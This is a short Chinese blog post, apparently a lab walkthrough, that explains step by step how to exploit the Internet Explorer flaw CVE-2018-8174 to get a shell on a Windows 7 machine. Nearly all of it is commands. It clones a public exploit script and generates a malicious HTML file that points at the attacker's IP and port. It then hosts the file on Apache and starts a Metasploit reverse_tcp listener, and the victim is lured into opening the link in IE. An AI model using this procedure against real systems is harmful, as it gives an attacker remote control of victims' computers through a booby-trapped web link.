利用 0DAY 漏洞 CVE-2018-8174 获取 shell
利用 0DAY 漏洞 CVE-2018-8174 获取 shell
1、安装 CVE-2018-8174_EXP
从 github 上克隆 CVE-2018-8174 的 EXP 到 Kali
https://github.com/Yt1g3r/CVE-2018-8174_EXP
2、生成恶意 html 文件
root@ kali:~# cd CVE-2018-8174_EXP/
root@ kali:~/CVE-2018-8174_EXP# ls
CVE-2018-8174.py README.md
root@ kali:~/CVE-2018-8174_EXP# python CVE-2018-8174.py -u
http://192.168.185.252/exploit.html -o hack.rtf -i 192.168.185.252 -p 4444
恶意 html 文件生成成功:
3、将恶意 html 文件移动到网站根目录
root@ kali:~/CVE-2018-8174_EXP# cp exploit.html /var/www/html/
启动 apache2 服务
root@ kali:~/CVE-2018-8174_EXP# service apache2 start
新打开一个终端 CTRL+SHIFT+T,生成 MSF 监听
root@ kali:~# msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.185.252
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > run
受害者点击恶意链接
进入 win7,打开 IE 浏览器或是 IE 内核的浏览器,比如 360 浏览器,访问恶意链接
http://192.168.185.252/exploit.html
返回 kali 查看已经建立会话
本文来自博客园,作者:长温不喜风云,转载请注明原文链接:https://www.cnblogs.com/changwen12138/p/18987616